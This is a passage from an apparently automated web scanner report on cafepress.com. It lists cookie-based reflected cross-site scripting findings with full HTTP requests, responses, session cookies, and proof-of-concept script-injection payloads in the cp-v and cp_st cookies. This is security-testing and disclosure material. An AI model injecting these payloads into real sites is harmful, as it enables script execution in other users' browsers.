Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd8dde"-alert(1)-"0740f775c1c; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 112228
Date: Sun, 26 Dec 2010 13:48:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 112228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd8dde"-alert(1)-"0740f775c1c";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.117. http://www.cafepress.com/make/custom-t-shirts [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-t-shirts

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ba57</script><script>alert(1)</script>0e63e38f264 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-t-shirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=8ba57</script><script>alert(1)</script>0e63e38f264; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 112251
Date: Sun, 26 Dec 2010 13:48:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 112251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '8ba57</script><script>alert(1)</script>0e63e38f264'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.118. http://www.cafepress.com/make/custom-thermos [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-thermos

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eea1"-alert(1)-"d0c14b83f86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8eea1"-alert(1)-"d0c14b83f86; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 55394
Date: Sun, 26 Dec 2010 13:48:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8eea1"-alert(1)-"d0c14b83f86";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.119. http://www.cafepress.com/make/custom-thermos [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-thermos

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc081</script><script>alert(1)</script>a5d7c25c9aa was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=cc081</script><script>alert(1)</script>a5d7c25c9aa; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 55416
Date: Sun, 26 Dec 2010 13:48:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'cc081</script><script>alert(1)</script>a5d7c25c9aa'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.120. http://www.cafepress.com/make/custom-water-bottles [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-water-bottles

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67f7b"-alert(1)-"cf8efdc4007 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA67f7b"-alert(1)-"cf8efdc4007; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 58828
Date: Sun, 26 Dec 2010 13:48:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA67f7b"-alert(1)-"cf8efdc4007";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.121. http://www.cafepress.com/make/custom-water-bottles [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/custom-water-bottles

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bca4a</script><script>alert(1)</script>d8d616836de was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/custom-water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=bca4a</script><script>alert(1)</script>d8d616836de; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
